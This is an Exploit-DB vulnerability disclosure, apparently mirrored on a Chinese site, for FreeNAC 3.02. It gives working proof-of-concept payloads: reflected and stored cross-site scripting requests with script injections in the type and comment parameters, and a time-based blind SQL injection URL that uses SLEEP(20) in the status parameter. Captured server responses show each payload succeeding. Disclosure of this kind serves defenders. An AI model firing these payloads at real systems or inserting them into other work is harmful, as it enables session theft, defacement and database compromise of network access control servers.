FreeNAC 3.02 – SQL Injection / Cross-Site Scripting

  • 作者: blake
    日期: 2012-05-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18900/
  • FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties
Date: May 19, 2012
Author: Blake
Software Link: http://sourceforge.net/project/showfiles.php?group_id=170004
Version: 3.02
Tested on: Ubuntu 8.04 (freenac version 3.02 vmware appliance)

FreeNAC FreeNAC provides Virtual LAN assignment, LAN access control (for all kinds of network devices such as Servers, Workstations, Printers, IP-Phones ..), live network end-device discovery.Both 802.1x and Cisco's VMPS port security modes are supported. VLAN, switch port management and documentation of Patch cabling is also included.


==========================================================================================================================================
Reflective Cross-Site Scripting:
Multiple parameters are vulnerable to reflective cross-site scripting.

Affected Parameters:
comment
mac 
graphtype
type 
name


Example Request:
GET /stats.php?graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1
Host: 192.168.1.118
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://192.168.1.118/stats.php?graphtype=bar&type=switch
Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e

Example Response:
HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:42:41 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5676
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	<title>FreeNAC :: Swisscom ::</title>
	<link href="https://www.exploit-db.com/exploits/18900/bw.css" rel="stylesheet" type="text/css" />
	</head>
<a href='https://www.exploit-db.com/exploits/18900/index.html' title='Main Menu'><img src='https://www.exploit-db.com/exploits/18900/images/logo_small.png' border='0' /></a>


..........snip......................

<img src="https://www.exploit-db.com/exploits/18900/statgraph.php?stattype=vlan13<script>alert(1)</script>&order=DESC&graphtype=bar"><br>
<br><p class='UpdateMsg'>Database error</p>
<p>Please go <a HREF='javascript:javascript:history.go(-1)'>back to the previous screen</a>, or the 
<a href='https://www.exploit-db.com/exploits/18900/index.php' >Main Menu</a> and start again, or try again later.</p>




==========================================================================================================================================
Stored Cross-Site Scripting:
The comment parameter is vulnerable to stored cross-site scripting.

Example Request:
<changed from a POST to a GET>
http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1

Example Response:
HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:53:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6945
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	<title>FreeNAC :: Swisscom ::</title>
	<link href="https://www.exploit-db.com/exploits/18900/bw.css" rel="stylesheet" type="text/css" />
	</head>
<a href='https://www.exploit-db.com/exploits/18900/index.html' title='Main Menu'><img src='https://www.exploit-db.com/exploits/18900/images/logo_small.png' border='0' /></a>

.............snip.................

</td></tr>
 <tr><td>Switch:</td>
 <td>, port= , location=</td>
 <td><input type="submit" name="action" class="bluebox" value="Restart Port" /> </td>
 </tr> <tr><td>Comment:</td><td>
<input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/>
</td><td>Last IP:NONE<br></td>
<tr><td> </td><td></td></tr>
<tr><td> </td><td>
<input type="submit" name="action" class="bluebox" value="Update" /> 
<input type="submit" name="action" class="bluebox" value="Delete" 
onClick="javascript:return confirm('Really DELETE this end-device record?')"
/>
</td></tr>'<tr><td> </td><td></td></tr>
<tr><td> </td><td></td></tr>
</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
<tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
<tr><td>Classification:


............snip....................





==========================================================================================================================================
SQL Injection:

The status parameter is vulnerable to blind SQL Injection.
Injecting a time-delay of 20 seconds:

http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1
    Python